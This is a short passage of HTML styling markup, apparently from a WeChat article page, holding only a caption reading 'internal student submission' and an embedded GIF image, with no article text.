0px;font-size: 16px;letter-spacing: 0.544px;white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;background-color: rgb(255, 255, 255);text-align: right;color: rgb(163, 163, 163) !important;"><span style="font-size: 13px;outline: 0px;letter-spacing: 0.544px;">内部学员投稿</span></p><p data-darkmode-bgcolor-15976329806349="rgb(25, 25, 25)" data-darkmode-original-bgcolor-15976329806349="rgb(255, 255, 255)" data-style="font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; white-space: normal; background-color: rgb(255, 255, 255); text-align: center;" class="js_darkmode__3" style="outline: 0px;font-size: 16px;letter-spacing: 0.544px;white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;background-color: rgb(255, 255, 255);text-align: center;color: rgb(163, 163, 163) !important;"><img class="rich_pages __bg_gif wxw-img" data-ratio="0.5197505197505198" data-type="gif" data-w="962" style="outline: 0px;box-sizing: border-box !important;visibility: visible !important;width: 677px !important;height: auto !important;" src="https://mmbiz.qpic.cn/mmbiz_gif/Uq8QfeuvouibQiaEkicNSzLStibHWxDSDpKeBqxDe6QMdr7M5ld84NFX0Q5HoNEedaMZeibI6cKE55jiaLMf9APuY0pA/640?wx_fmt=gif"></p><p><br></p></section>
